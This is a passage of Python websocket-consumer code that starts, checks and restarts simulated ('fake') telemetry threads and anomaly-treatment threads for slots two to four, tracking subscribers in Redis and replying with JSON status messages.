global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 2 and Fake AT Thread 2 was '
'already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 2 and send back error message
else:
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 2 was already running but failure to start fake '
'telemetry thread 2. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 2 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[1].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Fake at thread 2 and fake telemetry thread 2 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[1] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 2",
args=(
global_obj.simulator_to_hub_queues[
1],
global_obj.hub_to_simulator_queues[
1]
))
global_obj.simulator_threads[1].start()
# If simulator thread 2 start was successful then assign it to fake telemetry 2 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[1].is_alive():
print("Fake Telemetry Thread 2 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 2 and Fake AT Thread 2 '
'was already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 2 and send back error message
else:
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 2 was already running but failure to start fake '
'telemetry thread 2. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If not alive then reinitialize it and handle telemetry feed normally
else:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[1] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 2",
args=(
global_obj.hub_to_simulator_at_queues[
1],
global_obj.simulator_at_to_hub_queues[
1],
))
global_obj.simulator_at_threads[1].start()
# If simulator at thread 2 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[1].is_alive():
print("Fake AT Thread 2 started.")
# Check if simulator thread 2 has not been initialized, then initialize it
if global_obj.simulator_threads[1] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[1] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 2",
args=(
global_obj.simulator_to_hub_queues[
1],
global_obj.hub_to_simulator_queues[
1]
))
global_obj.simulator_threads[1].start()
# If simulator thread 2 start was successful then assign it to fake telemetry 2 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[1].is_alive():
print("Fake Telemetry Thread 2 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 2 and Fake AT Thread 2.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 2 and send back error message
else:
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 2 but failure to start fake '
'telemetry thread 2. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 2 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[1].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 2 and fake telemetry thread 2 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[1] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 2",
args=(
global_obj.simulator_to_hub_queues[
1],
global_obj.hub_to_simulator_queues[
1]
))
global_obj.simulator_threads[1].start()
# If simulator thread 2 start was successful then assign it to fake telemetry 2 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[1].is_alive():
print("Fake Telemetry Thread 2 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 2 and Fake AT Thread 2.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 2 and send back error message
else:
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 2 but failure to start fake '
'telemetry thread 2. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 2 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 2. Fake telemetry 2 was not started.',
'attempt': content.get('attempt')
}
}))
# Fake telemetry 3 check
elif r.scard('fake-telemetry-three') == 0:
# Check if simulator at thread 3 has not been initialized, then initialize it
if global_obj.simulator_at_threads[2] is None:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[2] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 3",
args=(
global_obj.hub_to_simulator_at_queues[2],
global_obj.simulator_at_to_hub_queues[2],
))
global_obj.simulator_at_threads[2].start()
# If simulator at thread 3 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[2].is_alive():
print("Fake AT Thread 3 started.")
# Check if simulator thread 3 has not been initialized, then initialize it
if global_obj.simulator_threads[2] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[2] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 3",
args=(
global_obj.simulator_to_hub_queues[
2],
global_obj.hub_to_simulator_queues[2]
))
global_obj.simulator_threads[2].start()
# If simulator thread 3 start was successful then assign it to fake telemetry 3 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[2].is_alive():
print("Fake Telemetry Thread 3 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 3 and Fake AT Thread 3.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 3 and send back error message
else:
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 3 but failure to start fake '
'telemetry thread 3. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 3 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[2].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 3 and fake telemetry thread 3 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[2] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 3",
args=(
global_obj.simulator_to_hub_queues[
2],
global_obj.hub_to_simulator_queues[
2]
))
global_obj.simulator_threads[2].start()
# If simulator thread 3 start was successful then assign it to fake telemetry 3 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[2].is_alive():
print("Fake Telemetry Thread 3 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 3 and Fake AT Thread 3.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 3 and send back error message
else:
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 3 but failure to start fake '
'telemetry thread 3. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 3 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 3. Fake telemetry 3 was not started.',
'attempt': content.get('attempt')
}
}))
# Simulator at thread 3 has already been initialized
else:
# Check if alive then handle telemetry feed normally
if global_obj.simulator_at_threads[2].is_alive():
# Check if simulator thread 3 has not been initialized, then initialize it
if global_obj.simulator_threads[2] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[2] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 3",
args=(
global_obj.simulator_to_hub_queues[
2],
global_obj.hub_to_simulator_queues[2]
))
global_obj.simulator_threads[2].start()
# If simulator thread 3 start was successful then assign it to fake telemetry 3 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[2].is_alive():
print("Fake Telemetry Thread 3 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 3 and Fake AT Thread 3 was '
'already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 3 and send back error message
else:
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 3 was already running but failure to start fake '
'telemetry thread 3. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 3 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[2].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Fake at thread 3 and fake telemetry thread 3 were'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[2] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 3",
args=(
global_obj.simulator_to_hub_queues[
2],
global_obj.hub_to_simulator_queues[
2]
))
global_obj.simulator_threads[2].start()
# If simulator thread 3 start was successful then assign it to fake telemetry 3 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[2].is_alive():
print("Fake Telemetry Thread 3 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 3 and Fake AT Thread 3 '
'was already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 3 and send back error message
else:
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 3 was already running but failure to start fake '
'telemetry thread 3. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If not alive then reinitialize it and handle telemetry feed normally
else:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[2] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 3",
args=(
global_obj.hub_to_simulator_at_queues[
2],
global_obj.simulator_at_to_hub_queues[
2],
))
global_obj.simulator_at_threads[2].start()
# If simulator at thread 3 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[2].is_alive():
print("Fake AT Thread 3 started.")
# Check if simulator thread 3 has not been initialized, then initialize it
if global_obj.simulator_threads[2] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[2] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 3",
args=(
global_obj.simulator_to_hub_queues[
2],
global_obj.hub_to_simulator_queues[
2]
))
global_obj.simulator_threads[2].start()
# If simulator thread 3 start was successful then assign it to fake telemetry 3 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[2].is_alive():
print("Fake Telemetry Thread 3 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 3 and Fake AT Thread 3.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 3 and send back error message
else:
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 3 but failure to start fake '
'telemetry thread 3. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 3 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[2].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 3 and fake telemetry thread 3 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[2] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 3",
args=(
global_obj.simulator_to_hub_queues[
2],
global_obj.hub_to_simulator_queues[
2]
))
global_obj.simulator_threads[2].start()
# If simulator thread 3 start was successful then assign it to fake telemetry 3 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[2].is_alive():
print("Fake Telemetry Thread 3 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 3 and Fake AT Thread 3.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 3 and send back error message
else:
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 3 but failure to start fake '
'telemetry thread 3. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 3 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 3. Fake telemetry 3 was not started.',
'attempt': content.get('attempt')
}
}))
# Fake telemetry 4 check
elif r.scard('fake-telemetry-four') == 0:
# Check if simulator at thread 4 has not been initialized, then initialize it
if global_obj.simulator_at_threads[3] is None:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[3] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 4",
args=(
global_obj.hub_to_simulator_at_queues[3],
global_obj.simulator_at_to_hub_queues[3],
))
global_obj.simulator_at_threads[3].start()
# If simulator at thread 4 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[3].is_alive():
print("Fake AT Thread 4 started.")
# Check if simulator thread 4 has not been initialized, then initialize it
if global_obj.simulator_threads[3] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[3] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 4",
args=(
global_obj.simulator_to_hub_queues[
3],
global_obj.hub_to_simulator_queues[3]
))
global_obj.simulator_threads[3].start()
# If simulator thread 4 start was successful then assign it to fake telemetry 4 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[3].is_alive():
print("Fake Telemetry Thread 4 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 4 and Fake AT Thread 4.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 4 and send back error message
else:
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 4 but failure to start fake '
'telemetry thread 4. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 4 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[3].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 4 and fake telemetry thread 4 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[3] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 4",
args=(
global_obj.simulator_to_hub_queues[
3],
global_obj.hub_to_simulator_queues[
3]
))
global_obj.simulator_threads[3].start()
# If simulator thread 4 start was successful then assign it to fake telemetry 4 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[3].is_alive():
print("Fake Telemetry Thread 4 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 4 and Fake AT Thread 4.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 4 and send back error message
else:
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 4 but failure to start fake '
'telemetry thread 4. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 4 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 4. Fake telemetry 4 was not started.',
'attempt': content.get('attempt')
}
}))
# Simulator at thread 4 has already been initialized
else:
# Check if alive then handle telemetry feed normally
if global_obj.simulator_at_threads[3].is_alive():
# Check if simulator thread 4 has not been initialized, then initialize it
if global_obj.simulator_threads[3] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[3] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 4",
args=(
global_obj.simulator_to_hub_queues[
3],
global_obj.hub_to_simulator_queues[3]
))
global_obj.simulator_threads[3].start()
# If simulator thread 4 start was successful then assign it to fake telemetry 4 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[3].is_alive():
print("Fake Telemetry Thread 4 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 4 and Fake AT Thread 4 was '
'already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 4 and send back error message
else:
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 4 was already running but failure to start fake '
'telemetry thread 4. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 4 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[3].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Fake at thread 4 and fake telemetry thread 4 were'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[3] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 4",
args=(
global_obj.simulator_to_hub_queues[
3],
global_obj.hub_to_simulator_queues[
3]
))
global_obj.simulator_threads[3].start()
# If simulator thread 4 start was successful then assign it to fake telemetry 4 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[3].is_alive():
print("Fake Telemetry Thread 4 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 4 and Fake AT Thread 4 '
'was already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 4 and send back error message
else:
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 4 was already running but failure to start fake '
'telemetry thread 4. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If not alive then reinitialize it and handle telemetry feed normally
else:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[3] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 4",
args=(
global_obj.hub_to_simulator_at_queues[
3],
global_obj.simulator_at_to_hub_queues[
3],
))
global_obj.simulator_at_threads[3].start()
# If simulator at thread 4 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[3].is_alive():
print("Fake AT Thread 4 started.")
# Check if simulator thread 4 has not been initialized, then initialize it
if global_obj.simulator_threads[3] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[3] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 4",
args=(
global_obj.simulator_to_hub_queues[
3],
global_obj.hub_to_simulator_queues[
3]
))
global_obj.simulator_threads[3].start()
# If simulator thread 4 start was successful then assign it to fake telemetry 4 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[3].is_alive():
print("Fake Telemetry Thread 4 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 4 and Fake AT Thread 4.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 4 and send back error message
else:
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 4 but failure to start fake '
'telemetry thread 4. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 4 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[3].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 4 and fake telemetry thread 4 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[3] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 4",
args=(
global_obj.simulator_to_hub_queues[
3],
global_obj.hub_to_simulator_queues[
3]
))
global_obj.simulator_threads[3].start()
# If simulator thread 4 start was successful then assign it to fake telemetry 4 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[3].is_alive():
print("Fake Telemetry Thread 4 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 4 and Fake AT Thread 4.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 4 and send back error message
else:
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 4 but failure to start fake '
'telemetry thread 4. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 4 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 4. Fake telemetry 4 was not started.',
'attempt': content.get('attempt')
}
}))
# Check if all are full
elif r.scard('fake-telemetry-one') == 1 and r.scard('fake-telemetry-two') == 1 and \
r.scard('fake-telemetry-three') == 1 and r.scard('fake-telemetry-four') == 1:
